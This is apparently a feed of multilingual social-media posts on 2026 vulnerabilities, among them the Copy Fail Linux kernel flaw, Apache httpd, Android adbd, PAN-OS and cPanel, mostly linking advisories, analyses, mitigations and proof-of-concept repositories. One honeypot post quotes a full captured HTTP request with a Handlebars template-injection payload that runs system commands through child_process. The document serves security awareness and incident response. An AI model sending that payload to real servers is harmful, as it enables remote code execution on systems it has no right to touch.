Une très bonne synthèse sur la faille CopyFail impactant le noyau Linux : historique de la faille, mécanisme d'exploitation, gestion érratique de la divulgation, mitigation - par Linuxtricks #Infosec #Linux https://www.linuxtricks.fr/news/10-logiciels-libres/600-copy-fail-cve-2026-31431-synthese-technique-sur-cette-faille-linux/

Oh hey, RHEL released patches for Copy Fail!

https://access.redhat.com/security/cve/cve-2026-31431

#CopyFail #RHEL #PatchesFinally

#OpenShift hosters 🔊 Red Hat has released blocker for copy-fail vulnerability, no reboots needed:

https://access.redhat.com/solutions/7142136

#RedHat #CopyFail #CVE202631431

CVE-2026-31431 #CopyFail shows that #LLM-assisted #cybersecurity research is:
1. Already there and massively impactful without #mythos.
2. Digestible by current governance systems of responsible disclosure.
3. Way more realistic than agents discovering, deploying and scaling exploits autonomously.
Details: https://xint.io/blog/copy-fail-linux-distributions

🚨ATENCIÓN: un bug en #linux lleva escondido 9 años en el sistema, se llama Copy Fail, está asociado a CVE-2026-31431, y afecta a una parte crítica del #kernel relacionada con algif_aead, la interfaz criptográfica usada para mover datos entre espacio de usuario y kernel.

en pocas palabras, un bug de Linux escondido durante 9 años puede permitir que un usuario sin privilegios escale hasta root en segundos.

Aquí en el video lo explica de que trata esta vulnerabilidad.👇 https://www.youtube.com/watch?v=R7_Jrm7zY-0

Sobre a CVE-31431 "Copy Fail":

Escrevi alguma coisa no github: https://github.com/darioomatos/cve-2026-31431-copyfail

Copy Fail: What You Need to Know About the Most Severe Linux Threat in Years

https://unit42.paloaltonetworks.com/cve-2026-31431-copy-fail/

Read on HackerWorkspace: https://hackerworkspace.com/article/copy-fail-what-you-need-to-know-about-the-most-severe-linux-threat-in-years

#cybersecurity #threatintelligence #vulnerability

Cuidado con este fallo que afecta a los sistemas Linux... https://www.adslzone.net/noticias/seguridad/vulnerabilidad-copy-fail-linux-cve-2026-31431/

I just came across another article that was also published yesterday on #podman rootless containers and #copyfail. This one takes a closer look at the exploit itself and how the kernel handles the attempt to escalate privileges. It also draws a similar conclusion regarding the role of user namespaces in limiting exposure in rootless mode.

Great read! https://www.dragonsreach.it/2026/05/04/cve-2026-31431-copy-fail-rootless-containers/

@mttaggart https://blog.feistel.party/2026/04/30/deny-alg-socket-to-containers-with-selinux-to-mitigate-cve-2026-31431.html

Not sure if this helps

#TUTORIALES

📢 Cómo comprobar y mitigar la vulnerabilidad Copy Fail (CVE-2026-31431) en GNU/Linux

Detecta si tu sistema GNU/Linux es vulnerable a Copy Fail (CVE-2026-31431) y aprende a aplicar el fix correctamente.

https://voidnull.es/como-comprobar-y-mitigar-la-vulnerabilidad-copy-fail-cve-2026-31431-en-gnu-linux/

Presenting, for absolutely no reason at all, CVE-2026-31431 as a 587-byte x86_64 static ELF:
https://github.com/Rat5ak/CVE-2026-31431-CopyFail-static-ELF--POC

https://www.dragonsreach.it/2026/05/04/cve-2026-31431-copy-fail-rootless-containers/

Copy.fail: a small Linux kernel bug with an unusually big blast radius https://jorijn.com/en/blog/copy-fail-cve-2026-31431-linux-kernel-bug-explained/

Une analyse bien documentée de cette faille, qui est bien complexe, et basée sur une somme de mauvais comportements dans le noyau https://www.linuxtricks.fr/news/10-logiciels-libres/600-copy-fail-cve-2026-31431-synthese-technique-sur-cette-faille-linux/ #linux #sécurité #faille #analyse

Lmaooo
https://github.com/theori-io/copy-fail-CVE-2026-31431/issues/128

"That 'responsible disclosure' Thing"

A post with the details of CVE-2026-23918, the double free vulnerability fixed in Apache httpd 2.4.67.

#apache
https://eissing.org/icing/posts/responsible-disclosure/

@tychotithonus I just love the Debian security tracker, they manage the flood so good https://security-tracker.debian.org/tracker/CVE-2026-23918

Faille Apache : deux simples trames suffisent à faire un déni de service (CVE-2026-23918) https://www.it-connect.fr/faille-apache-deux-simples-trames-suffisent-a-faire-un-deni-de-service-cve-2026-23918/ #ActuCybersécurité #Cybersécurité #Vulnérabilité #Apache

#Apache HTTP Server Vulnerability CVE-2026-23918 Exposes Millions of Servers to Remote Code Execution Attacks.
Anyone running Apache httpd version 2.4.66 or earlier are strongly urged to upgrade immediately!

👇
https://gbhackers.com/apache-http-server-vulnerability-exposes-millions-rce/

Critical Apache HTTP/2 Flaw (CVE-2026-23918) Enables DoS and Potential RCE

https://thehackernews.com/2026/05/critical-apache-http2-flaw-cve-2026.html

Read on HackerWorkspace: https://hackerworkspace.com/article/critical-apache-http-2-flaw-cve-2026-23918-enables-dos-and-potential-rce

Summary of all Apache vulnerabilities: https://www.hackerworkspace.com/article/apache-http-server-2-4-vulnerabilities-the-apache-http-server-project

#cybersecurity #vulnerability #exploit

Está a ser uns dias complicados para muitos... 🫠

https://support.cpanel.net/hc/en-us/articles/40229402602519-Security-CVE-2026-23918

Actualiza tu Android ya: este fallo permite atacar el móvil sin que pulses nada 👇
https://www.adslzone.net/noticias/moviles/parche-seguridad-android-vulnerabilidad-cve-2026-0073/
#Ciberseguridad #Seguridad #Privacidad 🔏

OpenSSL's "0 means fail and 1 means success and oh yeah -1 also means fail" APIs have been causing bugs for decades.

https://barghest.asia/blog/cve-2026-0073-adb-tls-auth-bypass/

Today we are disclosing CVE-2026-0073:

A critical no-interaction proximal/adjacent remote code execution vulnerability in adbd's ADB-over-TCP authentication path.

Full technical write-up + exploit flow:

https://barghest.asia/blog/cve-2026-0073-adb-tls-auth-bypass/

Barguest Research Group found a critical no-interaction remote RCE in Android's Wireless Debugging ADB functionality.

https://barghest.asia/blog/cve-2026-0073-adb-tls-auth-bypass/

#android #adb #CVE #wirelessdebug #RCE #authbypass

CVE-2026-0073 affects Android’s System component and it can be exploited without any user interaction. https://www.securityweek.com/critical-remote-code-execution-vulnerability-patched-in-android-2/

La importancia de las actualizaciones de seguridad en los sistemas operativos en teléfonos móviles que en realidad son pequeños ordenadores ⚠️ 📱 👾

Actualiza tu Android ya: este fallo permite atacar el móvil sin que pulses nada

https://www.adslzone.net/noticias/moviles/parche-seguridad-android-vulnerabilidad-cve-2026-0073/

CVE-2026-0073 Android adbd TLS client-authentication bypass

https://barghest.asia/blog/cve-2026-0073-adb-tls-auth-bypass/

Read on HackerWorkspace: https://hackerworkspace.com/article/cve-2026-0073-android-adbd-tls-client-authentication-bypass

#cybersecurity #authentication #vulnerability

...sigh...
<insert HereWeGoAgain.gif meme>

~~~~~~~~~~~

Urgent Palo Alto Networks Security Advisory - Severity 9.3 · CRITICAL

Palo Alto Networks has published one new Security Advisory for a Critical Unauthenticated User initiated Buffer Overflow Vulnerability in User-ID™ Authentication Portal. This is available at https://security.paloaltonetworks.com/CVE-2026-0300

We strongly advise PAN-OS customers to read the advisory and take appropriate action immediately to protect their devices.

#PaloAlto #Cybersecurity #SysAdmin #Infosec

#PaloAlto PAN-OS Vulnerability CVE-2026-0300 Under Active Exploitation - Enables Remote Code Execution (#RCE) - CVSS 9.3 no patch released yet, but expected soon!
👇
https://thehackernews.com/2026/05/palo-alto-pan-os-flaw-under-active.html

Today in send a packet to a border security appliance and get root.

https://security.paloaltonetworks.com/CVE-2026-0300

Über 40.000 Server durch Zero-Day-Lücke in cPanel kompromittiert. Die Schwachstelle CVE-2026-41940 ermöglicht Angreifern Admin-Zugriff ohne Authentifizierung. #cPanel #Sicherheitslücke https://winfuture.de/news,158509.html?utm_source=Mastodon&utm_medium=ManualStatus&utm_campaign=SocialMedia

CVE-2026-41940 in cPanel & WHM under mass exploitation.
550K+ servers potentially exposed → auth bypass → ransomware deployment.
CISA urges immediate patching.

https://www.technadu.com/hackers-mass-exploit-critical-cpanel-vulnerability-may-impact-550000-potentially-vulnerable-servers/627301/

Patched yet?

#Infosec #Vulnerability

📰 Critical MetInfo CMS Vulnerability Under Active Exploitation

🚨 ACTIVE EXPLOITATION! A critical RCE flaw (CVE-2026-29014, CVSS 9.8) in MetInfo CMS is being widely exploited. Unauthenticated attackers can gain full server control. Patch immediately! #CVE #RCE #CyberSecurity #Vulnerability

🔗 https://cyber.netsecops.io

Seeing exploitation of CVE-2026-33937 but they target the example URI (/api/email/preview) that is only present in the writeup at https://github.com/EQSTLab/CVE-2026-33937

Here is a full request:

POST /api/email/preview HTTP/1.1
Host: x.x.x.x:8080
Connection: close
Content-Length: 585
Content-Type: application/json
User-Agent: Go-http-client/1.1

{"subject":"Interactive RCE","tpl":{"body":[{"escaped":true,"loc":null,"params":[{"data":false,"depth":0,"loc":null,"original":"this","parts":[],"type":"PathExpression"},{"loc":null,"original":1,"type":"NumberLiteral","value":"{},{})) + process.mainModule.require('child_process').execSync('echo __HBSRCE__;id;uname -a;hostname;nproc;echo __HBSRCE___END').toString() //"}],"path":{"data":false,"depth":0,"loc":null,"original":"lookup","parts":["lookup"],"type":"PathExpression"},"strip":{"close":false,"open":false},"type":"MustacheStatement"}],"loc":null,"strip":{},"type":"Program"}}

#dfir #honeypot #infosec #cybersecurity

CVE‑2026‑22679 is a critical unauthenticated RCE in Weaver E‑cology 10.0 exploited within five days of patch release. Attackers abused an exposed debug API endpoint to execute system commands. No workaround exists — upgrade to build 20260312 immediately. #CyberSecurity #RCE #ZeroTrust

https://thecybermind.co/2026/05/05/cve-2026-22679-weaver-ecology-rce/?utm_source=mastodon&utm_medium=jetpack_social

Kaspersky researchers just found and presented a Snapdragon 410/210/617 bootrom exploit - CVE-2026-25262 in this month’s Qualcomm security bulletin.

It’s well known that every forensics tool supported exploiting those SoCs from the bootrom, but for 9 years, nobody knew how they were doing it.

This is some amazing research that finally solves the mystery..

I’m sure the BananaHackers community of Snapdragon 210 flip phone modders will find a use for this.